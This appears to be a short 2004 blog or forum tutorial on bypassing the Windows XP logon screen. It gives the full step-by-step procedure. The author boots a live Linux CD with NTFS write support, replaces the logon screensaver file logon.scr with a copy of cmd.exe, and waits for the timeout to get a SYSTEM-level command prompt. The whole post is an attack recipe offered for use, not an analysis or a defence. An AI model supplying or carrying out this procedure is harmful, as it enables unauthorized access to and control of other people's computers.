Search
Sponsors
| 18 Jul '04 - 18:53 | maarten goet Tutorial: bypassing logon screen
In this tutorial I'll give you some insight into hacking your way into Windows. In Windows XP (all recent Microsoft OS's actually), on boot up you are presented with a logon screen. After a default timeout (approximately 10 to 15 minutes), if there is no interaction with the mouse or keyboard, the kernel executes the logon screensaver. Knowing this, it is possible to use this code execution path to gain elevated privileges if we can trick Windows into executing our code.
The way I did this is actually quite trivial. In my case, I simply booted into an environment that would let me access the filesystem directly (for this I use a slightly modified version of Knoppix with NTFS write support) and simply tamper with the logon screensaver. In Windows XP, this file is located at %SYSTEMROOT%\System32\logon.scr. I replaced it with a copy of cmd.exe, and then synced the disk and unmounted it.
Once my "Trojan" was in place, I ejected my boot CD, rebooted the machine and waited. Windows XP booted up to its logon screen, waiting for me to enter my credentials. But I didn't. I just sat there, enjoying a coffee, documenting my procedures to this point. About 15 minutes later, Windows XP launched my version of the logon screen saver, giving me a command prompt. But not just ANY command prompt. A command prompt with SYSTEM privileges. For those of you that do not know, consider SYSTEM as a process with almost the same privileges as the Administrator. I'm in. Now, simply type "explorer" and watch the system come up.